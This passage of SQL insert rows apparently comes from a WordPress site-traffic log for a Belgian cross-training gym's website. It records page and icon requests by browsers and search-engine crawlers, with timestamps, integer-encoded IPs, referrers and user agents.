(77073, 1499775814.915579, 3154445620, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77074, 1499775815.411974, 3154445620, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77075, 1499775815.854991, 3154445620, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77076, 1499775816.288932, 3154445620, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77077, 1499775816.733245, 3154445620, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77078, 1499775817.195497, 3154445620, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77079, 1499778037.109974, 1123632645, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77080, 1499778920.500793, 1375118415, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(77081, 1499778921.992483, 1375118415, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(77082, 1499778938.818189, 1375118415, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(77083, 1499778955.523086, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77084, 1499778969.382152, 1375118415, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(77085, 1499779070.673504, 1375118415, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(77086, 1499779076.794711, 1375118415, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(77087, 1499779102.428108, 1375118415, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(77088, 1499779146.702448, 1375118415, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4'),
(77089, 1499783291.730139, 2637637530, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77090, 1499784651.965210, 1332604279, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-J510FN Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(77091, 1499784654.751978, 1332604279, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-J510FN Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(77092, 1499786576.614371, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77093, 1499787810.689727, 3024883606, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(77094, 1499789456.148644, 3281714082, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/css/modules.php', 'http://www.crosstrainingcenter.be/wp-includes/css/modules.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(77095, 1499798696.815792, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77096, 1499798697.269245, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77097, 1499800395.989568, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77098, 1499801917.200370, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/266-2/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77099, 1499801923.476144, 1375113052, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77100, 1499802130.688957, 3639886582, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(77101, 1499802921.368506, 1375113052, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77102, 1499802921.929673, 1375113052, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77103, 1499802922.424620, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77104, 1499802922.974219, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77105, 1499802923.434869, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77106, 1499802923.986901, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77107, 1499802924.176637, 1375113052, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77108, 1499802924.807959, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77109, 1499802924.953205, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77110, 1499802925.335380, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77111, 1499802925.390688, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77112, 1499802925.822699, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77113, 1499802925.826815, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77114, 1499802926.335118, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77115, 1499802926.336746, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77116, 1499802927.048734, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77117, 1499802927.056857, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77118, 1499802927.804754, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77119, 1499802928.417303, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77120, 1499802928.847385, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77121, 1499802929.309584, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77122, 1499802929.808210, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77123, 1499804630.921862, 3639886582, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(77124, 1499805012.464483, 1532393936, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77125, 1499805016.006273, 1532393936, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77126, 1499805046.999158, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77127, 1499805053.996099, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77128, 1499805058.305973, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77129, 1499805186.283342, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77130, 1499805200.358777, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77131, 1499805274.057789, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77132, 1499805288.265196, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77133, 1499805350.678766, 2637637429, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77134, 1499805433.448304, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77135, 1499805439.709139, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77136, 1499805466.028009, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77137, 1499805484.798144, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77138, 1499805504.713984, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77139, 1499805545.303099, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77140, 1499805596.275320, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77141, 1499805743.491837, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77142, 1499805765.288032, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77143, 1499805776.079859, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77144, 1499805780.808107, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77145, 1499805788.418541, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77146, 1499806001.980663, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77147, 1499808153.182974, 2521218217, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'),
(77148, 1499821997.643031, 786801763, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(77149, 1499823152.109526, 1608331759, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1479.dJlTcMat6Mml6odSoX9rDmnyf1RzO8J4p6Yq6wgQ7ddw8se4IU9grgpcMC06J-OZ.5b39ea5b57888919beb7f2b5e048c05aef60098f&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMkOSpatjLUqgxH-XWLwn-g&data=UlNrNmk5WktYejR0eWJFYk1LdmtxdERIY2V5clo0anlnUTNZelprRlJ2dGI0WTNiY1MxUVNmRlJRam5DMTZnZ3k2cFJNbEtCWjdVMUl6bHNiUXFmdXNrVWMwZGVMVzhUWk1FVVpVWHQ4a3M&b64e=2&sign=b30eef1c7c85fcf36e902a655a1f19b8&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrxhLbEUAh8s3bY_abYEd6WxBvVmBtfElUAMAI-wBve7nVjn2R9a-uXZNjn3Cr0LiHEYgZ5WPW4D67pn-v_tkj2Fgd8FrVqdd524pX1HzUPSLaIMlYNtMFnU_w8SJJLvIO&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCW8s5kfnNkNj9LdsjK3VprqYk-qmdzb9PhT-bENK0CItfnMXa50e2da_6pm8vMp-dbn2f18ahrV9kng-wIiTJXp&l10n=ru&cts=1499822800856&mc=3.94281270404', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(77150, 1499825306.772825, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77151, 1499827746.384722, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(77152, 1499827747.741733, 2760155453, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(77153, 1499837560.370579, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(77154, 1499837560.885358, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(77155, 1499839745.421190, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77156, 1499844476.979724, 1375113052, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77157, 1499844477.690843, 1375113052, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77158, 1499844478.181532, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77159, 1499844478.713854, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77160, 1499844479.165305, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77161, 1499844479.641753, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77162, 1499844480.233651, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77163, 1499844480.752090, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77164, 1499844481.279528, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77165, 1499844481.781085, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77166, 1499844482.254368, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77167, 1499849512.798440, 3154508589, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77168, 1499849578.033454, 1532393936, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77169, 1499849669.650127, 1532393936, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77170, 1499849669.687068, 1532393936, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/548452661.png', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(77171, 1499850592.205769, 3652617237, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(77172, 1499857474.390755, 1123631127, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77173, 1499857475.402490, 1123632645, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77174, 1499858927.119325, 1463955851, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77175, 1499858927.628882, 1463955851, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77176, 1499858928.145355, 1463955851, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77177, 1499858928.638765, 1463955851, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77178, 1499858929.155429, 1463955851, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77179, 1499858929.622055, 1463955851, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77180, 1499858930.353620, 1463955851, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77181, 1499858930.866287, 1463955851, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
